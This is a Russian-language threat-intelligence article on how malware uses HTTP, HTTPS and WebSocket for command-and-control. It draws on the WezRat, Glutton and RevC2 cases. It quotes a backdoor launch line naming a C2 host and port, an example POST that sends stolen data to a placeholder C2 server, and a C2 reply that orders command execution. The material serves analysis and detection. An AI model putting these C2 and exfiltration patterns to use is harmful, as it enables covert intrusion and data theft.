Злоумышленники используют протоколы HTTP, HTTPS и WebSocket для операций командования и управления (C2) благодаря их широкому распространению и способности органично сочетаться с легитимным веб-трафиком. HTTP/S позволяет скомпрометированным системам получать инструкции или передавать данные, а шифрование HTTPS еще больше скрывает вредоносный контент от средств защиты.
Протокол прикладного уровня: Веб-протоколы
WebSocket расширяет эти возможности, предоставляя постоянный, полнодуплексный канал связи для передачи данных и выполнения команд в режиме реального времени, снижая накладные расходы на повторные запросы. Вместе эти протоколы позволяют злоумышленникам уклоняться от обнаружения, используя доверенный веб-трафик для сокрытия своих операций и обхода традиционных средств защиты.
Например, вредоносная программа WezRat, о которой сообщалось в ноябре 2024 года, устанавливает командно-административную связь (C2) с помощью HTTPS в рамках цепочки заражения. После того как фишинговое письмо обманом заставляет жертву посетить вредоносный сайт-подобие (il-cert[.]net), ей предлагается загрузить поддельный файл Google Chrome Installer.msi. Этот MSI-файл не только поставляет легитимный установщик Chrome, но и загружает и запускает вредоносный бэкдор Updater.exe с аргументами сервера C2.
| 1 | "C:\Program Files (x86)\Google\Update\Updater.exe" connect.il-cert.net 8765 |
Бэкдор использует протокол HTTPS для безопасного взаимодействия с сервером C2, расположенным по адресу connect.il-cert[.]net. Этот обмен данными включает в себя отправку системной информации, получение зашифрованных команд и утечку украденных данных. Используя HTTPS, WezRat гарантирует, что его трафик остается зашифрованным, что позволяет ему избегать обнаружения средствами безопасности, которые полагаются на проверку обычного сетевого трафика. Шифрование маскирует вредоносную активность под легитимный веб-трафик, что еще больше усложняет идентификацию и блокировку.
В случае с вредоносной программой Glutton, обнаруженной в декабре 2024 года, HTTP занимает центральное место в модульной структуре атаки. Вредоносная программа периодически опрашивает сервер C2 с помощью стандартных HTTP-запросов GET или POST, чтобы получить обновленные команды или дополнительную полезную нагрузку. После загрузки эти полезные нагрузки запускаются для выполнения файловых операций, сбора системной информации или внедрения кода в такие фреймворки, как Laravel и ThinkPHP.
Примечательно, что Glutton не шифрует свой C2-трафик, полагаясь на HTTP с открытым текстом для доставки инструкций по выполнению задач и новых модулей. Вредоносная программа имитирует легитимный веб-трафик, встраивая команды в HTTP-заголовки или ответы и используя периодический опрос, чтобы избежать обнаружения.
Например, в следующем HTTP POST-запросе вредоносная программа передает собранные данные, такие как украденные файлы или учетные данные, на C2-сервер:
| 1 2 3 4 5 | POST /data/upload HTTP/1.1 Host: c2.example.com Content-Type: application/json Content-Length: 78 {"system":"hostname","data":"base64-encoded information"} |
В ответ сервер C2 может передать вредоносному ПО такие команды, как:
| 1 | {"command":"exec","payload":"ls -al"} |
Это демонстрирует техническую универсальность HTTP для обеспечения незаметных, модульных и постоянных операций C2.
В другом случае, в период с августа по октябрь 2024 года, был обнаружен бэкдор RevC2, использующий WebSockets - протокол, работающий поверх HTTP/S - для связи C2. На техническом уровне RevC2 использует WebSocket для своего канала связи, который является расширением HTTP, но позволяет осуществлять полнодуплексную связь в реальном времени между вредоносным ПО (выступающим в роли клиента) и сервером C2. Первоначальное WebSocket-соединение начинается с HTTP-квитирования: вредоносная программа отправляет HTTP-запрос на сервер C2, содержащий заголовок Upgrade, сигнализирующий о намерении установить WebSocket-соединение. Когда сервер отвечает статусом 101 Switching Protocols, соединение переходит с HTTP на WebSocket, обеспечивая непрерывную двустороннюю связь без необходимости многократно устанавливать новые HTTP-соединения.
Природа WebSocket дает RevC2 значительное преимущество в плане скрытности и эффективности. В отличие от обычного HTTP, где каждая команда требует отдельного запроса и ответа, WebSocket поддерживает постоянное соединение, позволяя вредоносному ПО беспрепятственно отправлять и получать данные по одному каналу. Это позволяет избежать частых попыток подключения, которые могут вызвать подозрения. Кроме того, во многих средах трафик WebSocket неотличим от легитимного веб-трафика, поскольку он использует те же порты, что и HTTP (порт 80) или HTTPS (порт 443), и часто использует зашифрованную связь WebSocket Secure (WSS). Это делает инструменты глубокой проверки пакетов менее эффективными для обнаружения вредоносной активности.
